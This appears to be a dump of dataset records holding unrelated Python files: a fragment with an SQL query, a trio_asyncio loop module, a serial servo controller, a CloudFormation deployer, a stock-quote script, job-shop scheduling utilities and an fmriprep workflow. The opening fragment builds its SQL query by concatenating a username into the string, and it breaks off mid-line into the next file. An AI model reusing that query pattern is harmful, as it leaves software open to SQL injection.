isdead_read=(\"SELECT * FROM deadlist where username='\"+str(username)+\"'\")\r\n cursor.execute(isdead_read)\r\n x=0\r\n for Data in cursor:\r\n x=x+1\r\n if Data[1]==curdate:\r\n print(Data[0]+\" was pronounced dead at \"+Data[1]+\" for the reason \"+Data[2]+\"\\n\")\r\n deaddate=Data[1]\r\n #print(deaddate)\r\n #print(curdate)\r\n if x==1 or x>1:\r\n if int(deaddate) handler\n\n def attach_loop(self, loop):\n self._loop = loop\n\n async def _waitpid(self, pid, callback, *args):\n returncode = await wait_for_child(pid)\n callback(pid, returncode, *args)\n\n def add_child_handler(self, pid, callback, *args):\n \"\"\"Add a callback to run when a child process terminates.\"\"\"\n h = self._loop.run_trio(self._waitpid, pid, callback, *args)\n self._callbacks[pid] = h\n\n def remove_child_handler(self, pid):\n \"\"\"Remove the callback to run when a child process terminates.\"\"\"\n h = self._callbacks.pop(pid, None)\n if h is None:\n return False\n h.cancel()\n return True\n\n def close(self):\n for pid in list(self._callbacks):\n h = self._callbacks.pop(pid, None)\n if h is None:\n continue\n h.cancel()\n self._loop = None\n\n def __enter__(self):\n return self\n\n def __exit__(self, *tb):\n self.close()\n\n\nasync def run_asyncio(proc, *args):\n loop = asyncio.get_event_loop()\n if not isinstance(loop, TrioEventLoop):\n raise RuntimeError(\"Need to run in a trio_asyncio.open_loop() context\")\n return await loop.run_asyncio(proc, *args)\n\n\nasync def run_coroutine(fut, scope=None):\n loop = asyncio.get_event_loop()\n if not isinstance(loop, TrioEventLoop):\n raise RuntimeError(\"Need to run in a trio_asyncio.open_loop() context\")\n return await loop.run_coroutine(fut, scope=scope)\n\n\ndef run_trio(proc, *args):\n \"\"\"Call an asynchronous Trio function from asyncio.\n\n Returns a Future with the result / exception.\n\n Cancelling the future will cancel the Trio task running your\n function, or prevent it from starting if that is still possible.\n\n You need to handle errors yourself.\n \"\"\"\n loop = asyncio.get_event_loop()\n if not isinstance(loop, TrioEventLoop): # pragma: no cover\n raise RuntimeError(\"Need to run in a trio_asyncio.open_loop() context\")\n return loop.run_trio(proc, *args)\n\n\ndef run_trio_task(proc, *args):\n \"\"\"Call an asynchronous Trio function from sync context.\n\n This method queues the task and returns immediately.\n It does not return a value.\n\n An uncaught error will propagate to, and terminate, the trio-asyncio loop.\n \"\"\"\n loop = asyncio.get_event_loop()\n if not isinstance(loop, TrioEventLoop):\n raise RuntimeError(\"Need to run in a trio_asyncio.open_loop() context\")\n loop.run_trio_task(proc, *args)\n\n\ndef run(proc, *args, queue_len=None):\n \"\"\"Like :func:`trio.run`, but adds a context that supports asyncio.\n \"\"\"\n\n async def _run_task(proc, args):\n async with open_loop(queue_len=queue_len):\n return await proc(*args)\n\n trio.run(_run_task, proc, args)\n\n\nasyncio.set_event_loop_policy(TrioPolicy())\n", "sub_path": "trio_asyncio/loop.py", "file_name": "loop.py", "file_ext": "py", "file_size_in_byte": 7229, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "asyncio.events", "line_number": 33, "usage_type": "attribute"}, {"api_name": "async_.TrioEventLoop", "line_number": 34, "usage_type": "name"}, {"api_name": "trio.hazmat.RunLocal", "line_number": 38, "usage_type": "call"}, 
{"api_name": "trio.hazmat", "line_number": 38, "usage_type": "attribute"}, {"api_name": "trio.hazmat.current_task", "line_number": 42, "usage_type": "call"}, {"api_name": "trio.hazmat", "line_number": 42, "usage_type": "attribute"}, {"api_name": "sys.modules", "line_number": 44, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 45, "usage_type": "call"}, {"api_name": "sync.SyncTrioEventLoop", "line_number": 51, "usage_type": "call"}, {"api_name": "trio.hazmat.current_task", "line_number": 72, "usage_type": "call"}, {"api_name": "trio.hazmat", "line_number": 72, "usage_type": "attribute"}, {"api_name": "trio.hazmat.current_task", "line_number": 92, "usage_type": "call"}, {"api_name": "trio.hazmat", "line_number": 92, "usage_type": "attribute"}, {"api_name": "asyncio.DefaultEventLoopPolicy", "line_number": 105, "usage_type": "attribute"}, {"api_name": "asyncio.events", "line_number": 107, "usage_type": "attribute"}, {"api_name": "threading.current_thread", "line_number": 110, "usage_type": "call"}, {"api_name": "threading._MainThread", "line_number": 110, "usage_type": "attribute"}, {"api_name": "threading.current_thread", "line_number": 114, "usage_type": "call"}, {"api_name": "threading._MainThread", "line_number": 114, "usage_type": "attribute"}, {"api_name": "child.wait_for_child", "line_number": 141, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 173, "usage_type": "call"}, {"api_name": "async_.TrioEventLoop", "line_number": 174, "usage_type": "argument"}, {"api_name": "asyncio.get_event_loop", "line_number": 180, "usage_type": "call"}, {"api_name": "async_.TrioEventLoop", "line_number": 181, "usage_type": "argument"}, {"api_name": "asyncio.get_event_loop", "line_number": 196, "usage_type": "call"}, {"api_name": "async_.TrioEventLoop", "line_number": 197, "usage_type": "argument"}, {"api_name": "asyncio.get_event_loop", "line_number": 210, "usage_type": "call"}, {"api_name": "async_.TrioEventLoop", "line_number": 211, "usage_type": "argument"}, {"api_name": "async_.open_loop", "line_number": 221, "usage_type": "call"}, {"api_name": "trio.run", "line_number": 224, "usage_type": "call"}, {"api_name": "asyncio.set_event_loop_policy", "line_number": 227, "usage_type": "call"}]} {"seq_id": "633495836", "text": "import serial, time\nimport sys\nimport glob\n\n\ndef serial_ports():\n \"\"\" Lists serial port names\n\n :raises EnvironmentError:\n On unsupported or unknown platforms\n :returns:\n A list of the serial ports available on the system\n \"\"\"\n if sys.platform.startswith('win'):\n ports = ['COM%s' % (i + 1) for i in range(256)]\n elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):\n # this excludes your current terminal \"/dev/tty\"\n ports = glob.glob('/dev/tty[A-Za-z]*')\n elif sys.platform.startswith('darwin'):\n ports = glob.glob('/dev/tty.*')\n else:\n raise EnvironmentError('Unsupported platform')\n\n result = []\n for port in ports:\n try:\n s = serial.Serial(port)\n s.close()\n result.append(port)\n except (OSError, serial.SerialException):\n pass\n return result\n\n\ndef setup_ser():\n ser = serial.Serial()\n ser.port = \"COM11\"\n ser.baudrate = 57600\n\n\n ser.open()\n\n if ser.isOpen():\n ser.flushInput() #flush input buffer, discarding all its contents\n ser.flushOutput()#flush output buffer, aborting current output\n #and discard all that is in buffer\n\n cmd_l = ['1','c','2','c','3','c','4','c','5','c','6','c' ]\n cmd_l2 = ['1', 'o', '2', 'o', '3', 'o', '4', 'o', '5', 'o', '6', 'o']\n\n while 
True:\n        cmd = input(\"Enter command or 'ex':\")\n        if cmd == 'ex':\n            ser.close()\n            return\n        else:\n            if cmd == '1':\n                for c in cmd_l:\n                    ser.write(c.encode())\n                    time.sleep(.06)\n            else:\n                for c in cmd_l2:\n                    ser.write(c.encode())\n                    time.sleep(.06)\n\n    else:\n        print(\"cannot open serial port \")\n\n\nif __name__ == '__main__':\n    print(serial_ports())\n    setup_ser()\n\n\n\n\n\n\n\n\n\n", "sub_path": "xl320_control/xl_320_control_python/xl320_multiple_sercontrol.py", "file_name": "xl320_multiple_sercontrol.py", "file_ext": "py", "file_size_in_byte": 1999, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "sys.platform.startswith", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.platform.startswith", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 16, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.platform.startswith", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 19, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 20, "usage_type": "call"}, {"api_name": "serial.Serial", "line_number": 27, "usage_type": "call"}, {"api_name": "serial.SerialException", "line_number": 30, "usage_type": "attribute"}, {"api_name": "serial.Serial", "line_number": 36, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 60, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 64, "usage_type": "call"}]} {"seq_id": "482506536", "text": "\"\"\"\nStackShipper\n\nStackShipper receives details about a template's location in S3\nand uses the CloudFormation API to deploy the stack\n\"\"\"\n\nfrom botocore.exceptions import ClientError\nfrom cloudwedge.models import AWSService\nfrom cloudwedge.utils.logger import get_logger\n\nLOGGER = get_logger('StackShipper')\n\n# Holder for boto3 client\nCLIENT_FORMATION = None\n\nclass StackShipper():\n    def __init__(self, session, s3_bucket: str, s3_key: str, stack_name: str, stack_type: str,\n                 stack_owner: str):\n        # Place the inputs on self\n        self.session = session\n        self.bucket = s3_bucket\n        self.template_key = s3_key\n        self.stack_name = stack_name\n        self.stack_type = stack_type\n        self.stack_owner = stack_owner\n\n    def ship(self):\n        \"\"\"Receive template and deploy\"\"\"\n\n        global CLIENT_FORMATION\n\n        if not CLIENT_FORMATION:\n            CLIENT_FORMATION = self.session.client('cloudformation')\n\n        LOGGER.info(\n            f\"StackShipper: bucket={self.bucket} key={self.template_key} stack={self.stack_name}\")\n\n        try:\n            # Try to run update stack first\n            self._post_stack('update_stack')\n            LOGGER.info(f'Updated Stack: {self.stack_name}')\n\n        except ClientError as err:\n            # 1) No updates, we can be done\n            if 'No updates are to be performed' in err.response['Error']['Message']:\n                LOGGER.info(f'No updates are to be performed.')\n\n            # 2) Stack doesn't exist, run create\n            elif 'does not exist' in err.response['Error']['Message']:\n\n                # If it failed on update because it doesn't exist, create instead\n                try:\n                    self._post_stack('create_stack')\n                    LOGGER.info(f'Created Stack: {self.stack_name}')\n                except ClientError as err:\n                    LOGGER.error(f'Failed to create Stack: {err}')\n                    raise err\n\n
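            # (Illustrative note, not in the original module:) the update-first /\n            # create-on-miss pattern here makes ship() effectively idempotent:\n            # re-delivering the same deploy event converges on the same stack.\n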
            # 3) Stack in progress, allow it to finish\n            elif any(x in err.response['Error']['Message'] for x in ['UPDATE_IN_PROGRESS', 'CREATE_IN_PROGRESS']):\n                # If it failed on update, it's already being updated; let's take our chance that the update in progress is good\n                # When an RDS tag is edited, it deletes the tag first which fires an event. Then it updates, another event :)\n                LOGGER.info(\n                    f'Stack update is in progress, allowing that stack to proceed. Aborting error free.')\n\n            # 4) Something else, the sky is falling\n            else:\n                LOGGER.error(f'Failed to deploy cloudformation: {err}')\n                raise err\n\n        except Exception as err:\n            LOGGER.error(f'Failed to deploy cloudformation: {err}')\n            raise err\n\n    def _post_stack(self, api_name: str):\n        \"\"\"Create or update the stack via the named CloudFormation API call\"\"\"\n\n        LOGGER.info(f\"Running {api_name} for {self.stack_name}\")\n\n        try:\n            # Get api method from cloudformation boto3 client and run it\n            getattr(CLIENT_FORMATION, api_name)(\n                StackName=self.stack_name,\n                TemplateURL=f\"https://s3.amazonaws.com/{self.bucket}/{self.template_key}\",\n                Capabilities=[\n                    \"CAPABILITY_IAM\",\n                ],\n                Tags=[\n                    {\n                        'Key': AWSService.TAG_STACK_ID_KEY,\n                        'Value': AWSService.TAG_STACK_ID_VALUE\n                    },\n                    {\n                        'Key': AWSService.TAG_OWNER,\n                        'Value': self.stack_owner\n                    },\n                    {\n                        'Key': AWSService.TAG_STACK_TYPE_KEY,\n                        'Value': self.stack_type\n                    }\n                ]\n            )\n\n        except Exception as err:\n            raise err\n", "sub_path": "app/src/deploy_stack/stack_shipper.py", "file_name": "stack_shipper.py", "file_ext": "py", "file_size_in_byte": 3892, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "cloudwedge.utils.logger.get_logger", "line_number": 12, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 44, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 56, "usage_type": "name"}, {"api_name": "cloudwedge.models.AWSService.TAG_STACK_ID_KEY", "line_number": 91, "usage_type": "attribute"}, {"api_name": "cloudwedge.models.AWSService", "line_number": 91, "usage_type": "name"}, {"api_name": "cloudwedge.models.AWSService.TAG_STACK_ID_VALUE", "line_number": 92, "usage_type": "attribute"}, {"api_name": "cloudwedge.models.AWSService", "line_number": 92, "usage_type": "name"}, {"api_name": "cloudwedge.models.AWSService.TAG_OWNER", "line_number": 95, "usage_type": "attribute"}, {"api_name": "cloudwedge.models.AWSService", "line_number": 95, "usage_type": "name"}, {"api_name": "cloudwedge.models.AWSService.TAG_STACK_TYPE_KEY", "line_number": 99, "usage_type": "attribute"}, {"api_name": "cloudwedge.models.AWSService", "line_number": 99, "usage_type": "name"}]} {"seq_id": "603070253", "text": "import sys\nimport tushare as ts\n\nargv = sys.argv[1:]\n\ntry:\n    code = argv[0]\nexcept IndexError:\n    print('Code is required')\n    exit(1)\n\ndf = ts.get_realtime_quotes(code)\n\nprint(df.to_json(orient='records'))", "sub_path": "python/get_realtime_quotes.py", "file_name": "get_realtime_quotes.py", "file_ext": "py", "file_size_in_byte": 215, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sys.argv", "line_number": 4, "usage_type": "attribute"}, {"api_name": "tushare.get_realtime_quotes", "line_number": 12, "usage_type": "call"}]} {"seq_id": "617775784", "text": "import numpy as np\nimport copy\nfrom collections import OrderedDict\n\n# NOTE: ALL INDICES IN THIS PROGRAM START FROM 0, I.E., OUTPUT IDS START FROM 0\n\n# THE NEIGHBOURHOOD OF A NODE IS DEFINED AS THE SET OF ITS PRECEDENT NODES IN THE ADJUNCTIVE AND DISJUNCTIVE GRAPHS\n\n\n
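# Illustrative usage (assumed Taillard-style benchmark file; not in the original):\n#   gen = InstanceGenerator('tai20_15.txt', number_of_jobs=20, number_of_machines=15)\n#   noisy = gen.generate_noisy_version_for_given_instance('instance_1', std=5)\n\n\n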
file_path, number_of_jobs, number_of_machines):\n        \"\"\"\n        :param file_path: data file path\n        :param number_of_jobs: the number of jobs for this type of problem\n        :param number_of_machines: the number of machines for this type of problem\n        \"\"\"\n        self.file_path = file_path\n        self.number_of_jobs = number_of_jobs\n        self.number_of_machines = number_of_machines\n        # generate the problem instances dict\n        self.instances_stat_dict = self._read_in_data()\n\n    def _read_in_data(self):\n        \"\"\"\n        :return: dict of all instances read from the data file, of the format:\n                {\n                \"instance_i\": {'Times': n_jobs * n_machines list\n                                'Machines': n_jobs * n_machines list\n                                'Nb of Jobs': int\n                                'Nb of Machines': int\n                                'Time seed': int\n                                'Machine seed': int\n                                'Upper bound': int\n                                'Lower bound': int},\n                i = 1, 2, 3, ...\n                \"Problem\": 'n_jobs' + '_' + 'n_machines'\n                }\n                it is a dictionary of dictionaries\n                query: what is instance_1's Lower bound?\n                run code: self.instances_stat_dict[\"instance_1\"][\"Lower bound\"]\n                The data matrices (Times & Machines) are stored as lists and can easily be converted to numpy arrays\n        \"\"\"\n\n        # initialize the lists\n        tags_list = []\n        tags_value_list = []\n        duration_list = []\n        machine_list = []\n\n        # open the data file\n        file_reading_obj = open(self.file_path)\n        # list of all lines in the file\n        lines = file_reading_obj.readlines()\n\n        # save data...\n        for i in range(len(lines)):\n\n            if \"seed\" in lines[i]:\n                # saving tags (getting rid of the trailing '\\n' using 'rstrip()')\n                # rstrip() strips only from the right end, while strip() removes characters from both ends\n                tags_list.append([str(tag).rstrip() for tag in lines[i].split(\", \")])\n\n                # saving each tag's value\n                tags_value_list.append([int(tag_value) for tag_value in lines[i+1].split()])\n\n            if \"Times\" in lines[i]:\n                temp_times = []\n                for j in range(self.number_of_jobs):\n                    temp_times.append([int(duration) for duration in lines[i+j+1].split()])\n                duration_list.append(temp_times)\n\n            if \"Machines\\n\" == lines[i]:\n                temp_machines = []\n                for j in range(self.number_of_jobs):\n                    temp_machines.append([int(machine) for machine in lines[i+j+1].split()])\n                machine_list.append(temp_machines)\n\n        # generate the instances dictionary...\n        instances_stat_dict = dict()\n        for i in range(len(tags_list)):\n            instances_stat_dict[\"instance_\"+str(i+1)] = {\n                \"Times\": duration_list[i],\n                \"Machines\": machine_list[i],\n            }\n            for j in range(len(tags_list[0])):\n                instances_stat_dict[\"instance_\"+str(i+1)][tags_list[i][j]] = tags_value_list[i][j]\n\n        instances_stat_dict[\"Problem\"] = str(self.number_of_jobs) + \"_\" + str(self.number_of_machines)\n\n        # close the file\n        file_reading_obj.close()\n\n        return instances_stat_dict\n\n    def generate_noisy_version_for_given_instance(self, instance_name, std):\n        \"\"\"\n        :param instance_name: the instance name like 'instance_1'; the problem class is already specified by the\n                arguments 'n_jobs' and 'n_machines'; to see it, just print out 'Belonging':\n                print(generate_noisy_version_for_given_instance(instance_name, std)['Belonging'])\n        :param std: standard deviation of the gaussian noise\n        :return: a gaussian noised instance\n                {'Times': n_jobs * n_machines list\n                'Machines': n_jobs * n_machines list\n                'Nb of Jobs': int\n                'Nb of Machines': int\n                'Time seed': int\n                'Machine seed': int\n                'Upper bound': 'Unknown'\n                'Lower bound': 'Unknown'\n                'Times_mean': n_jobs * n_machines list\n                'Belonging': str for which instance this generated noisy one belongs to\n                'Std': standard deviation for gaussian}\n
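        Hedged usage sketch (the file path is illustrative, mirroring the __main__ test code below):\n                gen = InstanceGenerator('../Data/tai15_15.txt', number_of_jobs=15, number_of_machines=15)\n                noisy = gen.generate_noisy_version_for_given_instance('instance_1', std=5)\n                noisy['Belonging']  # -> '15_15:instance_1'\n        TO BE NOTED:\n        AFTER ADDING GAUSSIAN NOISE, A NEW INSTANCE IS 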
GENERATED, SO ITS UPPER BOUND IS UNKNOWN\n        \"\"\"\n\n        instance_copy = copy.deepcopy(self.instances_stat_dict[instance_name])\n\n        # perturb every task duration (rows = jobs, columns = machines)\n        for i in range(len(instance_copy[\"Times\"])):\n            for j in range(len(instance_copy[\"Times\"][i])):\n                instance_copy[\"Times\"][i][j] = round(np.random.normal(instance_copy[\"Times\"][i][j], std))\n                if instance_copy[\"Times\"][i][j] < 0:\n                    instance_copy[\"Times\"][i][j] = 0\n\n        instance_copy[\"Upper bound\"] = \"Unknown\"\n        instance_copy[\"Lower bound\"] = \"Unknown\"\n        instance_copy[\"Belonging\"] = str(self.number_of_jobs) + \"_\" + str(self.number_of_machines) + \":\" + instance_name\n        instance_copy[\"Times_mean\"] = self.instances_stat_dict[instance_name]['Times']\n        instance_copy[\"Std\"] = std\n\n        return instance_copy\n\n\nclass GraphGenerator:\n    \"\"\"\n    This class generates a graph based on a given instance of a problem.\n    It is only used for generating the graph representation of a problem instance; the transition process\n    will be specified in the StochasticJSSP gym env, not here.\n\n    A node in the graph is represented as a vector of attributes,\n    node = [task_id, mean_duration, machine_id, neighbours_list], where the neighbours of a node are the ids of\n    its precedent nodes in the conjunctive and disjunctive graphs.\n    \"\"\"\n    def __init__(self, instance):\n        \"\"\"\n        :param instance: gaussian noised instance\n        \"\"\"\n        self.instance = instance\n        # generate the graph\n        self.graph = self._generate_graph()\n\n    def _generate_graph(self):\n        \"\"\"\n        :return: graph representation of an instance built from \"Times_mean\", of the format\n                {'[0, 1]': {'Machine_id': [int],\n                            'Mean duration': [int],\n                            'Std': [int],\n                            'Neighbourhood':[[], [], ...]\n                            }, ...}\n        \"\"\"\n\n        graph = []\n        meanduration_matrix = self.instance[\"Times_mean\"]\n        duration_matrix = self.instance[\"Times\"]\n        machine_matrix = self.instance['Machines']\n
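\n        # A hedged worked example (hypothetical 2 jobs x 2 machines, machine ids 1-indexed):\n        # with machine_matrix == [[1, 2], [2, 1]], the clique-building loop below yields\n        # machine_cliques == [[[0, 0], [1, 1]], [[0, 1], [1, 0]]], i.e. clique k lists the\n        # [job, task] positions that must be processed on machine k+1.\n        # initialize machine cliques. 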
The machine cliques hold ids of tasks that need to be scheduled on machines.\n machine_cliques = [[i] for i in range(self.instance['Nb of Machines'])]\n # generate machine cliques\n for i in range(len(machine_matrix)):\n for j in range(len(machine_matrix[0])):\n machine_cliques[machine_matrix[i][j]-1].append([i, j])\n # delete position ele 'i' ...\n for i in range(len(machine_cliques)):\n machine_cliques[i].pop(0)\n\n # print(machine_cliques)\n\n # generate node info list\n for i in range(len(meanduration_matrix)): # row loop\n for j in range(len(meanduration_matrix[0])): # column loop\n # add task id, mean duration, machine id, and neighbours of disjunctive graph\n node_i_j = {\n 'Node_id': [i, j],\n 'Machine_id': [machine_matrix[i][j] - 1],\n 'Mean duration': [meanduration_matrix[i][j]],\n 'duration': [duration_matrix[i][j]],\n 'Std': [self.instance['Std']],\n 'Neighbourhood': machine_cliques[machine_matrix[i][j]-1],\n }\n deepNode_cp = copy.deepcopy(node_i_j)\n # delete index of itself from its neighbourhood\n deepNode_cp['Neighbourhood'].pop(node_i_j['Neighbourhood'].index(node_i_j['Node_id']))\n # add neighbour node of conjunctive graph,\n # if it is the first task, then its conjunctive neighbour is '[-1, -1]'\n deepNode_cp['Neighbourhood'].append([i, j-1] if j != 0 else [-1, -1])\n graph.append(deepNode_cp)\n '''\n # this code changes:\n # graph = [{\n 'Node_id': [0, 1],\n 'Machine_id': int,\n 'Mean duration': int,\n 'Std': int,\n 'Neighbourhood':[[], [], ...]\n }...]\n # to:\n # ret = {'[0, 1]': {'Machine_id': int,\n 'Mean duration': int,\n 'Std': int,\n 'Neighbourhood':[[], [], ...]\n }, ...}\n '''\n ret = dict({str(graph[i]['Node_id']): {j: copy.deepcopy(graph[i][j]) for j in graph[i] if j != 'Node_id'}\n for i in range(len(graph))})\n # print(ret)\n\n return ret\n\n def __get__(self, instance, owner, index):\n return self.graph[index]\n\n\ndef to_dict(ordered_dict):\n dic = dict(ordered_dict)\n for item in dic:\n dic[item] = dict(ordered_dict[item])\n return dic\n\n\ndef to_ordered_dict(dic):\n for node in dic:\n dic[node] = OrderedDict(dic[node])\n return OrderedDict(dic)\n\n\ndef to_numpy(graph_dict):\n \"\"\"\n :param graph_dict:\n :return: convert dict list attribute to numpy type\n \"\"\"\n '''\n try:\n cp = copy.deepcopy(graph_dict)\n for node in cp:\n for item in node:\n np.asarray(node[item])\n except TypeError:\n print(\"Please give graph dict to convert\")\n '''\n cp = dict()\n for node in graph_dict:\n cp[node] = dict()\n for item in graph_dict[node]:\n cp[node][item] = np.asarray(graph_dict[node][item])\n return cp\n\n\ndef get_index(neighbour):\n \"\"\"\n :param neighbour: nparray [job_id, task_id, disjunctive_indicator, conjunctive_indicator]\n :return: string '[job_id, task_id]'\n \"\"\"\n return str(neighbour[:2].tolist())\n\n\ndef override(fn):\n \"\"\"\n override decorator\n \"\"\"\n return fn\n\n\ndef index_helper(location, env):\n \"\"\"\n :param location: [i, j]\n :param env:\n :return: int index of given task [i, j]\n \"\"\"\n return location[0]*env.number_of_machines + location[1]\n\n\ndef get_neighbour_index(node, env):\n # node = '[i, j]'\n nei_idx_list = []\n for nei in env.state[node]['Neighbourhood']:\n if nei[2] != 0:\n nei_idx_list.append(nei[0:2].tolist())\n return nei_idx_list\n\n\nif __name__ == \"__main__\":\n\n '''\n Instances generator and graph generator test code...\n '''\n\n n_jobs = 15\n n_machines = 15\n f_path = \"../Data/tai\" + str(n_jobs) + \"_\" + str(n_machines) + \".txt\"\n\n # gaussian noise parameter\n std = 5\n\n instances = 
InstanceGenerator(file_path=f_path, number_of_jobs=n_jobs, number_of_machines=n_machines)\n\n gaussian_noised = instances.generate_noisy_version_for_given_instance(\"instance_1\", std=std)\n\n G = GraphGenerator(gaussian_noised)\n\n print(G.graph)\n to_arr = to_numpy(G.graph)\n", "sub_path": "Env/Env_utils.py", "file_name": "Env_utils.py", "file_ext": "py", "file_size_in_byte": 11458, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "copy.deepcopy", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 123, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 193, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 216, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 235, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 257, "usage_type": "call"}]} {"seq_id": "445099042", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\"\"\"\nApply susceptibility distortion correction (SDC)\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n\n.. topic :: Abbreviations\n\n fmap\n fieldmap\n VSM\n voxel-shift map -- a 3D nifti where displacements are in pixels (not mm)\n DFM\n displacements field map -- a nifti warp file compatible with ANTs (mm)\n\n\"\"\"\nfrom __future__ import print_function, division, absolute_import, unicode_literals\n\nimport pkg_resources as pkgr\n\nfrom nipype.pipeline import engine as pe\nfrom nipype.interfaces import utility as niu\nfrom nipype.interfaces import fsl\nfrom nipype.interfaces.ants import CreateJacobianDeterminantImage\nfrom niworkflows.interfaces.registration import ANTSApplyTransformsRPT, ANTSRegistrationRPT\nfrom niworkflows.interfaces.masks import ComputeEPIMask\n\nfrom fmriprep.interfaces import itk\nfrom fmriprep.interfaces import ReadSidecarJSON\nfrom fmriprep.interfaces.bids import DerivativesDataSink\n\n\ndef init_sdc_unwarp_wf(name='sdc_unwarp_wf', settings=None):\n \"\"\"\n This workflow takes in a displacements fieldmap and calculates the corresponding\n displacements field (in other words, an ANTs-compatible warp file).\n \n It also calculates a new mask for the input dataset that takes into account the distortions.\n The mask is restricted to the field of view of the fieldmap since outside of it corrections could not be performed.\n\n .. 
workflow ::\n\n from fmriprep.workflows.fieldmap.unwarp import init_sdc_unwarp_wf\n wf = init_sdc_unwarp_wf(settings={'reportlets_dir': '.', 'ants_nthreads': 8})\n\n\n Inputs\n\n in_reference\n the reference image\n in_mask\n a brain mask corresponding to ``in_reference``\n name_source\n path to the original _bold file being unwarped\n fmap\n the fieldmap in Hz\n fmap_ref\n the reference (anatomical) image corresponding to ``fmap``\n fmap_mask\n a brain mask corresponding to ``fmap``\n\n\n Outputs\n\n out_reference\n the ``in_reference`` after unwarping\n out_warp\n the corresponding :abbr:`DFM (displacements field map)` compatible with\n ANTs\n out_jacobian\n the jacobian of the field (for drop-out alleviation)\n out_mask\n mask of the unwarped input file\n out_mask_report\n reportled for the skullstripping\n\n \"\"\"\n\n if settings is None:\n # Don't crash if workflow used outside fmriprep\n settings = {'ants_nthreads': 6}\n\n workflow = pe.Workflow(name=name)\n inputnode = pe.Node(niu.IdentityInterface(\n fields=['in_reference', 'in_mask', 'name_source',\n 'fmap_ref', 'fmap_mask', 'fmap']), name='inputnode')\n outputnode = pe.Node(niu.IdentityInterface(\n fields=['out_reference', 'out_warp', 'out_mask',\n 'out_jacobian', 'out_mask_report']), name='outputnode')\n\n meta = pe.Node(ReadSidecarJSON(), name='meta')\n\n explicit_mask_epi = pe.Node(fsl.ApplyMask(), name=\"explicit_mask_epi\")\n\n # Register the reference of the fieldmap to the reference\n # of the target image (the one that shall be corrected)\n ants_settings = pkgr.resource_filename('fmriprep', 'data/fmap-any_registration.json')\n if settings.get('debug', False):\n ants_settings = pkgr.resource_filename(\n 'fmriprep', 'data/fmap-any_registration_testing.json')\n fmap2ref_reg = pe.Node(ANTSRegistrationRPT(generate_report=True,\n from_file=ants_settings, output_inverse_warped_image=True,\n output_warped_image=True, num_threads=settings['ants_nthreads']),\n name='fmap2ref_reg')\n fmap2ref_reg.interface.num_threads = settings['ants_nthreads']\n\n ds_reg = pe.Node(\n DerivativesDataSink(base_directory=settings['reportlets_dir'],\n suffix='fmap_reg'), name='ds_reg')\n\n # Map the VSM into the EPI space\n fmap2ref_apply = pe.Node(ANTSApplyTransformsRPT(\n generate_report=True, dimension=3, interpolation='BSpline', float=True),\n name='fmap2ref_apply')\n\n fmap_mask2ref_apply = pe.Node(ANTSApplyTransformsRPT(\n generate_report=False, dimension=3, interpolation='NearestNeighbor',\n float=True),\n name='fmap_mask2ref_apply')\n\n ds_reg_vsm = pe.Node(\n DerivativesDataSink(base_directory=settings['reportlets_dir'],\n suffix='fmap_reg_vsm'), name='ds_reg_vsm')\n\n # Fieldmap to rads and then to voxels (VSM - voxel shift map)\n torads = pe.Node(niu.Function(function=_hz2rads), name='torads')\n\n gen_vsm = pe.Node(fsl.FUGUE(save_unmasked_shift=True), name='gen_vsm')\n # Convert the VSM into a DFM (displacements field map)\n # or: FUGUE shift to ANTS warping.\n vsm2dfm = pe.Node(itk.FUGUEvsm2ANTSwarp(), name='vsm2dfm')\n jac_dfm = pe.Node(CreateJacobianDeterminantImage(\n imageDimension=3, outputImage='jacobian.nii.gz'), name='jac_dfm')\n\n unwarp_reference = pe.Node(ANTSApplyTransformsRPT(dimension=3,\n generate_report=False,\n float=True,\n interpolation='LanczosWindowedSinc'),\n name='unwarp_reference')\n\n fieldmap_fov_mask = pe.Node(niu.Function(function=_fill_with_ones), name='fieldmap_fov_mask')\n\n fmap_fov2ref_apply = pe.Node(ANTSApplyTransformsRPT(\n generate_report=False, dimension=3, interpolation='NearestNeighbor',\n 
